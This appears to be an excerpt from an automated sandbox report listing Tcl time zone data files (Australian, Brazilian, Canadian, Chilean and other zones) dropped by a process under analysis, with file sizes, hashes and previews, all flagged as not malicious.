                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Darwin)]} {. LoadTimeZoneFile Australia/Darwin.}.set TZData(:Australia/North) $TZData(:Australia/Darwin).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):714
                                                                                                                                                                                                                                                    Entropy (8bit):4.257489685002088
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Perth) {. {-9223372036854775808 27804 0 LMT}. {-2337925404 28800 0 AWST}. {-1672559940 32400 1 AWDT}. {-1665385200 28800 0 AWST}. {-883634400 32400 1 AWDT}. {-876121200 28800 0 AWST}. {-860392800 32400 1 AWDT}. {-844671600 28800 0 AWST}. {-836470800 32400 0 AWST}. {152042400 32400 1 AWDT}. {162928800 28800 0 AWST}. {436298400 32400 1 AWDT}. {447184800 28800 0 AWST}. {690314400 32400 1 AWDT}. {699386400 28800 0 AWST}. {1165082400 32400 1 AWDT}. {1174759200 28800 0 AWST}. {1193508000 32400 1 AWDT}. {1206813600 28800 0 AWST}. {1224957600 32400 1 AWDT}. {1238263200 28800 0 AWST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):198
                                                                                                                                                                                                                                                    Entropy (8bit):4.75392731256171
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Brisbane)]} {. LoadTimeZoneFile Australia/Brisbane.}.set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):193
                                                                                                                                                                                                                                                    Entropy (8bit):4.701653352722385
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Adelaide)]} {. LoadTimeZoneFile Australia/Adelaide.}.set TZData(:Australia/South) $TZData(:Australia/Adelaide).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8066
                                                                                                                                                                                                                                                    Entropy (8bit):3.763781985138297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Sydney) {. {-9223372036854775808 36292 0 LMT}. {-2364113092 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}. {352224000 36000 0 AEST}. {3
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.7264864039237215
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Hobart)]} {. LoadTimeZoneFile Australia/Hobart.}.set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):199
                                                                                                                                                                                                                                                    Entropy (8bit):4.7697171393457936
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Melbourne)]} {. LoadTimeZoneFile Australia/Melbourne.}.set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.781808870279912
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Perth)]} {. LoadTimeZoneFile Australia/Perth.}.set TZData(:Australia/West) $TZData(:Australia/Perth).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):207
                                                                                                                                                                                                                                                    Entropy (8bit):4.871861105493913
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3yIcKCFVAIgJKfF2DCkuM0DC9Kl:MBaIMjcKCQJKt2kVSKl
                                                                                                                                                                                                                                                    MD5:5C3CED24741704A0A7019FA66AC0C0A1
                                                                                                                                                                                                                                                    SHA1:88C7AF3B22ED01ED99784C3FAB4F5112AA4659F3
                                                                                                                                                                                                                                                    SHA-256:71A56C71CC30A46950B1B4D4FBB12CB1CBAA24267F994A0F223AE879F1BB6EEC
                                                                                                                                                                                                                                                    SHA-512:771A7AC5D03DD7099F565D6E926F7B97E8A7BA3795339D3FD78F7C465005B55388D8CC30A62978042C354254E1BA5467D0832C0D29497E33D6EF1DA217528806
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Broken_Hill)]} {. LoadTimeZoneFile Australia/Broken_Hill.}.set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189
                                                                                                                                                                                                                                                    Entropy (8bit):4.84045343046357
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0sMhS4edVAIg20sMhStQ1bNW1h4IAcGEsMhSA:SlSWB9IZaM3y7thtedVAIgpthKQxWh4y
                                                                                                                                                                                                                                                    MD5:DF4D752BEEAF40F081C03B4572E9D858
                                                                                                                                                                                                                                                    SHA1:A83B5E4C3A9EB0CF43263AFF65DB374353F65595
                                                                                                                                                                                                                                                    SHA-256:1B1AD73D3FE403AA1F939F05F613F6A3F39A8BA49543992D836CD6ED14B92F2C
                                                                                                                                                                                                                                                    SHA-512:1F96F1D8AACD6D37AC13295B345E761204DAE6AA1DF4894A11E00857CCB7247FA7BEBD22407EA5D13193E2945EB1F4210E32669069F157F1459B26643A67F445
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Rio_Branco)]} {. LoadTimeZoneFile America/Rio_Branco.}.set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.826795532956443
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0wKy4oedVAIg20wK+F1bIAJl0IAcGEwKyvn:SlSWB9IZaM3y7/rDdVAIgp/mxIAE90/8
                                                                                                                                                                                                                                                    MD5:86B9E49F604AD5DBC4EC6BA735A513C7
                                                                                                                                                                                                                                                    SHA1:BE3AB32339DF9830D4F445CCF883D79DDBA8708E
                                                                                                                                                                                                                                                    SHA-256:628A9AE97682B98145588E356948996EAE18528E34A1428A6B2765CCAA7A8A1F
                                                                                                                                                                                                                                                    SHA-512:EE312624EC0193C599B2BDBFA57CC4EA7C68890955E0D888149172DF8F2095C553BFBB80BF76C1B8F3232F3A5863A519FF59976BBAEA622C64737890D159AA22
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Noronha)]} {. LoadTimeZoneFile America/Noronha.}.set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):186
                                                                                                                                                                                                                                                    Entropy (8bit):4.9019570219911275
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0tQJXvedVAIg20tQJX1bJHIAcGEtQJXv:SlSWB9IZaM3y7tIGdVAIgptExR90tIv
                                                                                                                                                                                                                                                    MD5:FBF6B9E8B9C93B1B9E484D88EF208F38
                                                                                                                                                                                                                                                    SHA1:44004E19A485B70E003687CB1057B8A2421D1BF0
                                                                                                                                                                                                                                                    SHA-256:C89E831C4A0525C3CEFF17072843386369096C08878A4412FB208EF5D3F156D8
                                                                                                                                                                                                                                                    SHA-512:4E518FC4CED0C756FF45E0EDE72F6503C4B3AE72E785651DE261D3F261D43F914721EFCEAB272398BC145E41827F35D46DE4E022EAF413D95F64E8B3BD752002
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Sao_Paulo)]} {. LoadTimeZoneFile America/Sao_Paulo.}.set TZData(:Brazil/East) $TZData(:America/Sao_Paulo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.853909262702622
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0znQZFwFVAIg20znQoCxL1bbAWVIAcGEznQb:SlSWB9IZaM3y7zn+wFVAIgpznzCxLxnJ
                                                                                                                                                                                                                                                    MD5:116F0F146B004D476B6B86EC0EE2D54D
                                                                                                                                                                                                                                                    SHA1:1F39A84EF3DFF676A844174D9045BE388D3BA8C0
                                                                                                                                                                                                                                                    SHA-256:F24B9ED1FAFA98CD7807FFFEF4BACA1BCE1655ABD70EB69D46478732FA0DA573
                                                                                                                                                                                                                                                    SHA-512:23BD7EC1B5ADB465A204AAA35024EE917F8D6C3136C4EA973D8B18B586282C4806329CEBE0EDBF9E13D0032063C8082EC0D84A049F1217C856943A4DDC4900D0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Manaus)]} {. LoadTimeZoneFile America/Manaus.}.set TZData(:Brazil/West) $TZData(:America/Manaus).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7471
                                                                                                                                                                                                                                                    Entropy (8bit):3.710275786382764
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ht6CvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:PSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:AE72690EF7063F0B9F640096204E2ECE
                                                                                                                                                                                                                                                    SHA1:4F815B51DA9BCA97DFF71D191B74D0190890F946
                                                                                                                                                                                                                                                    SHA-256:BB2C5E587EE9F9BF85C1D0B6F57197985663D4DFF0FED13233953C1807A1F11C
                                                                                                                                                                                                                                                    SHA-512:F7F0911251BC7191754AF0BA2C455E825BF16EA9202A740DC1E07317B1D74CDAF680E161155CC1BD5E862DCEE2A58101F419D8B5E0E24C4BA7134999D9B55C48
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:CET) {. {-9223372036854775808 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-766623600 3600 0 CET}. {228877200 7200 1 CEST}. {243997200 3600 0 CET}. {260326800 7200 1 CEST}. {276051600 3600 0 CET}. {291776400 7200 1 CEST}. {307501200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8227
                                                                                                                                                                                                                                                    Entropy (8bit):3.723597525146651
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:KxrIOdXkqbfkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbo:KxrIOdXkqbfNTzZSJw5/9/yuvQ6crD5r
                                                                                                                                                                                                                                                    MD5:B5AC3FA83585957217CA04384171F0FF
                                                                                                                                                                                                                                                    SHA1:827FF1FBDADDDE3754453E680B4E719A50499AE6
                                                                                                                                                                                                                                                    SHA-256:17CBE2F211973F827E0D5F9F2B4365951164BC06DA065F6F38F45CB064B29457
                                                                                                                                                                                                                                                    SHA-512:A56485813C47758F988A250FFA97E2DBD7A69DDD16034E9EF2834AF895E8A374EEB4DA3F36E6AD80285AC10F84543ECF5840670805082E238F822F85D635651F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:CST6CDT) {. {-9223372036854775808 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-84384000 -18000 1 CDT}. {-68662800 -21600 0 CST}. {-52934400 -18000 1 CDT}. {-37213200 -21600 0 CST}. {-21484800 -18000 1 CDT}. {-5763600 -21600 0 CST}. {9964800 -18000 1 CDT}. {25686000 -21600 0 CST}. {41414400 -18000 1 CDT}. {57740400 -21600 0 CST}. {73468800 -18000 1 CDT}. {89190000 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -216
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.754307292225081
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Halifax)]} {. LoadTimeZoneFile America/Halifax.}.set TZData(:Canada/Atlantic) $TZData(:America/Halifax).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):186
                                                                                                                                                                                                                                                    Entropy (8bit):4.814426408072182
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Winnipeg)]} {. LoadTimeZoneFile America/Winnipeg.}.set TZData(:Canada/Central) $TZData(:America/Winnipeg).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.860347334610986
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:Canada/East-Saskatchewan) $TZData(:America/Regina).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.7067203041014185
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Toronto)]} {. LoadTimeZoneFile America/Toronto.}.set TZData(:Canada/Eastern) $TZData(:America/Toronto).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.768148288986999
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Edmonton)]} {. LoadTimeZoneFile America/Edmonton.}.set TZData(:Canada/Mountain) $TZData(:America/Edmonton).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):191
                                                                                                                                                                                                                                                    Entropy (8bit):4.953647576523321
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/St_Johns)]} {. LoadTimeZoneFile America/St_Johns.}.set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189
                                                                                                                                                                                                                                                    Entropy (8bit):4.839589386398345
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Vancouver)]} {. LoadTimeZoneFile America/Vancouver.}.set TZData(:Canada/Pacific) $TZData(:America/Vancouver).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.83938055689947
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:Canada/Saskatchewan) $TZData(:America/Regina).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.841592909599599
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0peR2pVkvFVAIg20peR2zxL0nTOK8x/h4IAcGEpeRu:SlSWB9IZaM3y7peR2fkvFVAIgppeR2FF
                                                                                                                                                                                                                                                    MD5:9F2A7F0D8492F67F764F647638533C3F
                                                                                                                                                                                                                                                    SHA1:3785DACD1645E0630649E411DC834E8A4FB7F40B
                                                                                                                                                                                                                                                    SHA-256:F2A81B7E95D49CEC3C8952463B727129B4DC43D58ADC64BB7CAB642D3D191039
                                                                                                                                                                                                                                                    SHA-512:0133870BB96851ECD486D55FD10EB4BCB1678772C1BFFADE85FC5644AC8445CDB4C6284BEFFED197E9386C9C6EF74F5F718F2CB43C4C7B8E65FE413C8EC51CD0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Whitehorse)]} {. LoadTimeZoneFile America/Whitehorse.}.set TZData(:Canada/Yukon) $TZData(:America/Whitehorse).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189
                                                                                                                                                                                                                                                    Entropy (8bit):4.762021566751952
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0tfEJ5YyVAIg20tfEJvYvWAt0dKLRMyREGH/h4IAcB:SlSWB9IZaM3y7tfEJHVAIgptfEJAvN0+
                                                                                                                                                                                                                                                    MD5:B2BDB6C027FF34D624EA8B992E5F41AB
                                                                                                                                                                                                                                                    SHA1:425AB0D603C3F5810047A7DC8FD28FDF306CC2DB
                                                                                                                                                                                                                                                    SHA-256:F2E3C1E88C5D165E1D38B0D2766D64AA4D2E6996DF1BE58DADC9C4FC4F503A2E
                                                                                                                                                                                                                                                    SHA-512:6E5A8DC6F5D5F0218C37EE719441EBDC7EDED3708F8705A98AEF7E256C8DC5D82F4BF82C529282E01D8E6E669C4F843B143730AD9D8BBF43BCC98ECB65B52C9B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Santiago)]} {. LoadTimeZoneFile America/Santiago.}.set TZData(:Chile/Continental) $TZData(:America/Santiago).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.758503564906338
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG7ZAJpVAIgObT7ZA6xL0bxOdBx/nUDH7ZAen:SlSWB9IZaM3ycJA3VAIgObJA6xL04dB4
                                                                                                                                                                                                                                                    MD5:E9DF5E3D9E5E242A1B9C73D8F35C9911
                                                                                                                                                                                                                                                    SHA1:9905EF3C1847CFF8156EC745779FCF0D920199B7
                                                                                                                                                                                                                                                    SHA-256:AA305BEC168C0A5C8494B81114D69C61A0D3CF748995AF5CCC3E2591AC78C90C
                                                                                                                                                                                                                                                    SHA-512:7707AC84D5C305F40A1713F1CBBED8A223553A5F989281CCDB278F0BD0D408E6FC9396D9FA0CCC82168248A30362D2D4B27EDEF36D9A3D70E286A5B668686FDE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Easter)]} {. LoadTimeZoneFile Pacific/Easter.}.set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                    Entropy (8bit):4.8073098952422395
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx02TEMVFwVAIg202TEKN0lIAcGE2TEMv:SlSWB9IZaM3y76EHVAIgp6EKN0l906Eu
                                                                                                                                                                                                                                                    MD5:BA8EE8511A2013E791A3C50369488588
                                                                                                                                                                                                                                                    SHA1:03BF30F56FB604480A9F5ECD8FB13E3CF82F4524
                                                                                                                                                                                                                                                    SHA-256:2F9DFE275B62EFBCD5F72D6A13C6BB9AFD2F67FDDD8843013D128D55373CD677
                                                                                                                                                                                                                                                    SHA-512:29C9E9F4B9679AFD688A90A605CFC1D7B86514C4966E2196A4A5D48D4F1CF16775DFBDF1C9793C3BDAA13B6986765531B2E11398EFE5662EEDA7B37110697832
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Havana)]} {. LoadTimeZoneFile America/Havana.}.set TZData(:Cuba) $TZData(:America/Havana).
